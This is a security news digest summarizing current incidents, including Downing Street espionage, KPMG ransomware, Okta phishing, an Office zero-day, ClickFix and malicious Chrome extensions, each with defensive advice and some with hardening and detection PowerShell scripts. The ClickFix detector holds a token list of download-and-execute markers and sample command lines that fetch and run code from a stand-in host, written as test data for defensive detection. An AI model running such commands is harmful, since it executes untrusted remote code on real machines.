Good Morning Security Gang
We’re almost through the first month of the year, and what a wild month it’s been for practitioners. Today’s show is stacked with stories that hit close to home for governments and enterprises alike: China’s years-long eavesdropping on Downing Street, ransomware striking KPMG Netherlands, phishing campaigns against Okta admins, a Microsoft Office zero-day under active exploitation, and cloud API flaws exposing physical access control systems across Europe.
We’ll also break down malware-laced Chrome extensions, India’s tax-season phishing campaigns, and Google’s latest privacy settlement that may just change how companies handle recordings.
"These threat actors aren't going anywhere. They're not. They're going to continue to move. As we move the goalposts forward, they follow along. They're still getting touchdowns. They're still getting field goals. They're still scoring goals. So we have to get more involved in the business process side of the house and we have to communicate it in a business-effective way." James Azar
Coffee cup cheers, y’all — I’ve got my Lavazza medium roast double espresso, so let’s get to work.
China’s Espionage Campaign Hits the Heart of Downing Street
An explosive report from the Telegraph reveals that Chinese intelligence operatives infiltrated senior officials’ mobile phones around 10 Downing Street for years, targeting aides to Boris Johnson, Liz Truss, and Rishi Sunak between 2021 and 2024. The breach reportedly penetrated cabinet-level communications and secure messaging systems, giving Beijing insight into UK diplomatic strategy, negotiation timings, and internal policy debates.
The discovery only surfaced after the U.S. shared intelligence on the “Salt Typhoon” espionage campaign with Five Eyes allies. British authorities are still determining whether Prime Ministers themselves were directly compromised.
As I said on the show:
“If Beijing can listen to Downing Street, imagine what they’re doing to private companies that don’t even have detection capability.”
This operation underscores that China’s cyber ambitions are about long-term intelligence positioning, not disruption. It is a wake-up call for enterprises doing business with the UK or China to assume ongoing exposure, tighten mobile device security, and keep sensitive diplomatic and executive communications on segregated channels.
Nova Ransomware Hits KPMG Netherlands
KPMG Netherlands confirmed a ransomware incident by the Nova gang, which claimed to have exfiltrated and encrypted sensitive data from the firm’s audit environment.
The danger here is data reuse: Nova’s playbook includes leaking authentic-looking audit working papers and supplier documents that can then be used to impersonate clients or commit financial fraud downstream.
My advice on the show was simple:
“This isn’t about encryption — it’s about brand exploitation. Ransomware’s new weapon is trust.”
If you’re a KPMG Netherlands customer:
Revoke all existing integration credentials and enforce callback verification on all audit-related communications.
Set new authentication keywords or key phrases for financial teams.
Reissue updated procedures for how auditors should contact accounts payable.
Operational readiness and internal alignment are your strongest defenses against supply chain fallout.
Okta Admin Phishing Surge Targets Identity Teams
A voice-phishing and MFA-fatigue campaign is hitting Okta and Microsoft admin teams: threat actors call help desks posing as employees and ask for password resets or MFA bypasses, often combined with SIM swapping and session hijacking.
The attackers only need one pressured help desk employee to pivot into critical SaaS or VPN access.
To mitigate:
Enforce ticketed, manager-approved resets for privileged accounts; no reset should complete inside a single phone call.
Require a shared-secret challenge before approving any reset, and treat a caller who cannot answer it as a security event, not a support ticket.
Empower help desks to say “no” and back them when they do.
As I emphasized: “If your identity provider is the crown jewel, stop letting anyone reset its keys without ceremony.”
Microsoft Office Zero-Day Actively Exploited
Microsoft has confirmed active exploitation of CVE-2026-21509, a zero-day affecting Office 2016, 2019, LTSC 2021/2024, and Microsoft 365 Apps. The bug allows remote code execution through weaponized documents, delivered mainly as email attachments that abuse macros or Office content handlers.
Attackers are using it to establish initial footholds before EDR signatures catch up, which is why the configuration controls below matter more than detection does.
Mitigation steps:
Enable “Block macros from running in Office files from the Internet” enterprise-wide via Group Policy, so users cannot re-enable macros from the Trust Center.
Minimize trusted-location and trusted-publisher exceptions, and disable legacy content handlers you do not need.
Push Microsoft’s patch as soon as it is available in your update channel.
As I put it:
“Every time we let one macro through, we’re not helping productivity — we’re funding persistence.”
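The two configuration steps above, as an added PowerShell example that is not from the show notes or from Microsoft: it writes the documented Office policy value that backs the “Block macros from running in Office files from the Internet” setting for the current user, audits the result, and turns on the Defender ASR rule that stops Office apps from spawning child processes (the usual macro-to-loader hop). It assumes Office 2016 or later (all of which read the 16.0 policy hive) and that the ASR call runs elevated with Defender AV active; fleet-wide you would push the same registry values with Group Policy rather than this script.

```powershell
# Added example (not from the show notes): enforce and audit the Office "block macros from the
# Internet" policy, then add the ASR rule that blocks Office child processes.
# Assumptions: Office 2016/2019/LTSC/M365 Apps (16.0 policy hive); Add-MpPreference needs an
# elevated session with Microsoft Defender Antivirus as the active engine.
$apps = 'word', 'excel', 'powerpoint', 'access', 'visio'

function Set-OfficeInternetMacroBlock {
    param([string[]]$Applications = $apps)
    foreach ($app in $Applications) {
        $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # 1 = block macros in files marked as coming from the Internet.
        # 0 or missing = leave it to the user's Trust Center choice, which is the weak state.
        Set-ItemProperty -Path $key -Name 'blockcontentexecutionfrominternet' -Value 1 -Type DWord
    }
}

function Get-OfficeInternetMacroBlock {
    param([string[]]$Applications = $apps)
    foreach ($app in $Applications) {
        $key   = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
        $value = (Get-ItemProperty -Path $key -Name 'blockcontentexecutionfrominternet' `
                    -ErrorAction SilentlyContinue).blockcontentexecutionfrominternet
        [pscustomobject]@{
            Application = $app
            PolicyValue = $value
            Enforced    = ($value -eq 1)   # $false when the value is missing or 0
        }
    }
}

function Enable-OfficeChildProcessBlock {
    # D4F940AB-401B-4EFC-AADC-AD5F3C50688A is the documented ASR rule id for
    # "Block all Office applications from creating child processes".
    Add-MpPreference -AttackSurfaceReductionRules_Ids 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' `
                     -AttackSurfaceReductionRules_Actions Enabled
}

Set-OfficeInternetMacroBlock
Get-OfficeInternetMacroBlock | Format-Table -AutoSize   # every row should read Enforced = True
Enable-OfficeChildProcessBlock
```

Run the audit function on its own against a sample of endpoints first: any row showing Enforced = False is a machine where a user (or a stale GPO) still decides whether Internet-sourced macros run.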
European Cloud Access Flaws Allow Remote Door Unlocking
Researchers at SEC Consult discovered cloud API flaws and default credentials in Dormakaba corporate access control systems deployed across Europe, allowing remote attackers to unlock physical doors and read badge logs.
Hundreds of enterprises are affected. Attackers could chain these flaws to gain physical entry, or to steal on-site devices and use them to pivot into on-prem networks.
To mitigate:
Isolate these systems on dedicated OT VLANs.
Remove direct internet exposure and restrict which source addresses and applications may call the API.
Rotate all cloud API keys immediately.
As I said: “You can’t have your door locks talking to the internet — that’s not access control, that’s an open invitation.”
ClickFix Malware Evolves with IT-Theater Trickery
The ClickFix technique has evolved with new fake update installers and scripted payloads disguised as legitimate Windows updates or IT service tools. Delivered via SEO poisoning, malvertising, and phishing, it walks users through pasting a PowerShell or VBScript one-liner into the Run box or a terminal, which pulls down a loader.
Best defenses:
Enforce Windows Defender Application Control and signed installer policies.
Block WScript and CScript execution for all non-IT users.
Monitor for script hosts (PowerShell, mshta, wscript, cscript) spawned by explorer.exe or a browser, which is exactly what a user pasting a ClickFix command into the Run box looks like in process telemetry.
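The detection in the last bullet, as an added example that is not from the show notes or from any vendor: a function that scores a process-creation event by its parent (explorer.exe or a browser, meaning an interactive paste) and by download-and-execute tokens in the command line, run over three constructed events shaped like Sysmon Event ID 1. Sysmon, the field names, and the score threshold are assumptions; tune the token list to your own admin tooling before alerting on it.

```powershell
# Added example (not from the show notes): flag the ClickFix pattern in process-creation telemetry.
# Assumptions: Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); sample events below are
# constructed; the threshold of 2 is a starting point, not a tuned value.
$ScriptHosts    = 'powershell.exe', 'pwsh.exe', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe'
$UserLaunchers  = 'explorer.exe', 'chrome.exe', 'msedge.exe', 'firefox.exe'
$SuspiciousArgs = @(
    '-enc', '-encodedcommand', '-w hidden', '-windowstyle hidden', 'iex', 'invoke-expression',
    'invoke-webrequest', 'downloadstring', 'mshta http', 'curl ', 'bitsadmin', '-nop', '-ep bypass'
)

function Test-ClickFixProcess {
    param(
        [Parameter(Mandatory)] [string]$Image,
        [Parameter(Mandatory)] [string]$ParentImage,
        [Parameter(Mandatory)] [string]$CommandLine
    )
    $exe    = [System.IO.Path]::GetFileName($Image).ToLower()
    $parent = [System.IO.Path]::GetFileName($ParentImage).ToLower()
    $cl     = $CommandLine.ToLower()
    if ($exe -notin $ScriptHosts) { return $null }          # only script hosts are interesting here

    $hits          = $SuspiciousArgs | Where-Object { $cl.Contains($_) }
    $fromUserShell = $parent -in $UserLaunchers
    # Score: 2 for an explorer/browser parent (a human pasted it), 1 per suspicious token.
    $score = $(if ($fromUserShell) { 2 } else { 0 }) + @($hits).Count
    if ($score -lt 2) { return $null }

    [pscustomobject]@{
        Image       = $exe
        Parent      = $parent
        Score       = $score
        Indicators  = @($hits) -join ','
        CommandLine = $CommandLine
    }
}

# Constructed sample events: a Run-box paste, a browser-launched mshta, and a benign scheduled script.
$events = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/x)"' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\mshta.exe'
                       ParentImage = 'C:\Program Files\Google\Chrome\Application\chrome.exe'
                       CommandLine = 'mshta http://example.invalid/fix.hta' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Windows\System32\svchost.exe'
                       CommandLine = 'powershell -File C:\ProgramData\Intune\inventory.ps1' }
)

# Expected: the first two events are reported (scores 5 and 3), the third is dropped (score 0).
$events | ForEach-Object {
    Test-ClickFixProcess -Image $_.Image -ParentImage $_.ParentImage -CommandLine $_.CommandLine
} | Format-Table -AutoSize

# Live use: read Sysmon with
#   Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -FilterXPath '*[System[EventID=1]]'
# convert each record with [xml]$_.ToXml(), pull Image/ParentImage/CommandLine from
# .Event.EventData.Data by Name, and feed them to Test-ClickFixProcess.
```

The parent check is what separates ClickFix from ordinary admin scripting: the same encoded PowerShell launched by a management agent scores 0 here, while the identical command line under explorer.exe or a browser is flagged. Pair this with the WScript/CScript block in the bullet above so the VBScript variants fail before they run.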
Chrome Web Store Extensions Weaponized Post-Approval
A new scheme dubbed “Guaranteed Approval Service” sells Chrome Web Store approvals to developers, who then push updates that turn the approved, benign-looking extensions into token-stealing malware on browsers that already have them installed.
These extensions hijack OAuth tokens, giving attackers persistent access to SaaS apps and cloud dashboards until those tokens are revoked.
Defensive actions:
Deploy enterprise browser management with allowlists.
Automatically revoke OAuth tokens when extensions are removed.
Treat browsers like endpoints — because they are.
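The allowlist in the first defensive bullet, as an added PowerShell example that is not from the show notes or from Google: it writes the Chrome machine policy keys that Chrome reads on Windows, blocklisting every extension with “*” and then allowlisting specific IDs, which is the documented way to get default-deny. It assumes an elevated session and managed Windows endpoints; the extension IDs passed in at the bottom are placeholders, not recommendations.

```powershell
# Added example (not from the show notes): default-deny Chrome extensions via Windows policy keys.
# Assumptions: run elevated; Chrome reads HKLM\SOFTWARE\Policies\Google\Chrome; list policies are
# stored as REG_SZ values named 1, 2, 3 ... The IDs used at the bottom are placeholders.
$ChromePolicyRoot = 'HKLM:\SOFTWARE\Policies\Google\Chrome'

function Set-ChromeExtensionAllowlist {
    param([Parameter(Mandatory)] [string[]]$AllowedIds)
    $block = "$ChromePolicyRoot\ExtensionInstallBlocklist"
    $allow = "$ChromePolicyRoot\ExtensionInstallAllowlist"
    foreach ($key in $block, $allow) {
        # Rebuild both lists from scratch so a stale entry cannot survive a change.
        if (Test-Path $key) { Remove-Item -Path $key -Recurse -Force }
        New-Item -Path $key -Force | Out-Null
    }
    New-ItemProperty -Path $block -Name '1' -Value '*' -PropertyType String | Out-Null   # deny everything ...
    $i = 1
    foreach ($id in $AllowedIds) {                                                       # ... except these
        New-ItemProperty -Path $allow -Name ([string]$i) -Value $id -PropertyType String | Out-Null
        $i++
    }
}

function Get-ChromeExtensionPolicy {
    foreach ($list in 'ExtensionInstallBlocklist', 'ExtensionInstallAllowlist') {
        $key = "$ChromePolicyRoot\$list"
        $entries = if (Test-Path $key) {
            $props = Get-ItemProperty -Path $key
            (Get-Item -Path $key).GetValueNames() | ForEach-Object { $props.$_ }
        } else { @() }
        [pscustomobject]@{ Policy = $list; Entries = (@($entries) -join ' ') }
    }
}

# Placeholder IDs (Chrome extension IDs are 32 characters from a-p); replace with your approved set.
Set-ChromeExtensionAllowlist -AllowedIds 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
Get-ChromeExtensionPolicy | Format-Table -AutoSize
```

Verify on a test machine by opening chrome://policy and confirming both lists show as applied; an allowlist with no matching “*” blocklist entry is not an allowlist, because anything not listed stays installable.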
India Tax Season Triggers Phishing Tsunami
It’s tax season in India, which means phishing campaigns impersonating the Income Tax Department and banks are surging. Attackers harvest PAN numbers and banking credentials through fake refund portals, targeting payroll vendors and expats.
Defensive measures:
Funnel all tax-related communications into a single verified mailbox.
Require out-of-band verification before processing any refunds or changes.
Reinforce awareness among payroll teams about spoofed government domains.
Google Settles $68M Voice Recording Privacy Case
Google will pay $68 million to settle a lawsuit over voice data collection and retention in its Assistant and Nest products. The claims centered on lack of consent and on retention of recordings beyond what users expected.
For enterprises, this is a warning: if you record calls or use AI assistants internally, you could be next.
Action steps:
Publish plain-language recording disclosures.
Offer opt-out options to employees and customers.
Enforce automated data deletion policies for recordings.
As I said: “Every ‘this call may be recorded’ message is a liability notice — not a disclaimer.”
Action List
🇨🇳 Secure executive mobile devices and monitor for spyware persistence.
💼 Revoke KPMG-linked credentials and establish callback validation.
🔐 Implement ticketed identity resets with shared-secret challenges.
📄 Patch Microsoft Office zero-day (CVE-2026-21509) immediately.
🚪 Segment access control systems and disable public API exposure.
🧩 Block unsigned installers and disable non-IT scripting tools.
🌐 Lock Chrome extensions to approved lists and monitor token reuse.
🏦 Train payroll and finance teams for tax-season phishing patterns.
🎙️ Revisit voice recording consent and data retention policies.
James Azar’s CISO’s Take
Today’s show was all about one theme — the invisible gates of trust. From Downing Street’s compromised phones to Okta resets, Office macros, and Chrome extensions, every compromise began with misplaced trust in systems, people, or processes. Attackers don’t need new exploits when we keep giving them the keys.
My biggest takeaway? Every security failure is a consent failure. Whether it’s approving a reset, running an installer, or leaving a door API exposed, trust should never be default — it should be earned, verified, and short-lived. The more we shorten the lifetime of that trust, the less room adversaries have to move.
"Today's show is really simple for me. It's about gates and seasons. The gates are the phones, help desk resets, Office content, door APIs, and browser extensions, and even some voice recordings – all are consent moments. If approval is sloppy, controls downstream won't save you. The seasons – audits, tax cycles – are attackers' calendars. They know what's coming. They know we're expecting it, and we're more likely to be fooled and duped." James Azar
Stay alert, stay caffeinated, and as always — stay cyber safe.